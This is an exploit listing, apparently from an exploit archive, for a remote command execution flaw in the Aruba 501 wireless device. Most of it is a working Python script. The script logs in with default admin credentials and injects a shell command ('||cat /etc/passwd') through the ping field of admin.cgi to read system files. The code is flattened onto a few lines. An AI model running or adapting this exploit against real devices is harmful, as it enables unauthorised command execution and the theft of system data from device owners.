Headline
Aruba 501 CN12G5W0XX Remote Command Execution
Aruba 501 version CN12G5W0XX suffers from a remote command execution vulnerability.
# Exploit Title: Remote Command Execution | Aurba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https://www.hpe.com# Version: Aurba 501 CN12G5W0XX# Tested on: Linuximport requestsfrom requests.auth import HTTPBasicAuthdef get_input(prompt, default_value): user_input = input(prompt) return user_input if user_input else default_valuebase_url = input("Enter the base URL: ")if not base_url: print("Base URL is required.") exit(1)username = get_input("Enter the username (default: admin): ", "admin")password = get_input("Enter the password (default: admin): ", "admin")login_url = f"{base_url}/login.cgi"login_payload = { "username": username, "password": password, "login": "Login"}login_headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "close"}session = requests.Session()requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# Login to the systemresponse = session.post(login_url, headers=login_headers, data=login_payload, verify=False)# Check if login was successfulif response.status_code == 200 and "login failed" not in response.text.lower(): print("Login successful!") # The command to be executed on the device command = "cat /etc/passwd" ping_ip = f"4.2.2.4||{command}" # Data to be sent in the POST request data = { "ping_ip": ping_ip, "ping_timeout": "1", "textareai": "", "ping_start": "Ping" } # Headers to be sent with the request headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Referer": f"{base_url}/admin.cgi?action=ping", "Connection": "close" } # Sending the HTTP POST request to exploit the vulnerability exploit_url = f"{base_url}/admin.cgi?action=ping" response = session.post(exploit_url, headers=headers, data=data, verify=False) if any("root" in value for value in response.headers.values()): print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") print(response.headers) else: print("Exploit failed. The response headers did not contain the expected output.")else: print("Login failed. Please check the credentials and try again.")# Print the response headers for further analysisprint(response.headers)